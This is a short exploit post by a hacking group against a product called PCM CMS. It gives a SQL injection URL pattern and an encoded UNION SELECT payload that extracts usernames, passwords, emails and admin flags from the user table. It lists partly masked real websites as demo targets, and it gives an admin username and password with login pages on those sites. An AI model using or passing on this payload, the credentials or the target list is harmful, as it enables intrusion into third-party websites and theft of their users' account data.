---------------IN THE NAME OF ALLAH-----------------
Title: PCM CMS SQL Injection & Duplicate Login Vulnerability
Discovered By : iranhack secrity team
Vendor : http://www.pcm-nv.com/
Our Forum : http://iranhack.org/acc
Exploit :
localhost/get_gallery.php?id={SQL}
DeMO:
http://www.XXmptonsnow.com/get_gallery.php?id=-248
http://mariXXa1.com/get_gallery.php?id=7
http://huntiXXXonlandmark.com/get_gallery.php?id=428
http://www.casXXXl.com/get_gallery.php?id=195
http://www.wooXXXryhoa.org/get_gallery.php?id=449
Exploit 2 ( Duplicate Login ) :
http://www.haXXXnsnow.com/login.php
http://mXXXposa1.com/login.php
http://huntinXXXnlandmark.com/login.php
http://www.casXXXdelsol.com/login.php
http://www.wooXXXuryhoa.org/login.php
Username : admin / Password : 4tre$$1024
==================================================
Inject : union%20select%201,2,group_concat%28u_name,char%2858%29,char%2858%29,u_pass,char%2858%29,char%2858%29,u_email,char%2858%29,char%2858%29,u_admin_allow%29,4,5%20from%20comm_user--+
Greetz : Mr.XpR - UnknowN - FarbodEZRaeL - Samim.s - Siamak.Black - Sianor - mh1376 - Love war- AL1R3Z4
And All Iranhack Bug ResarcherS
./ IRaNHaCK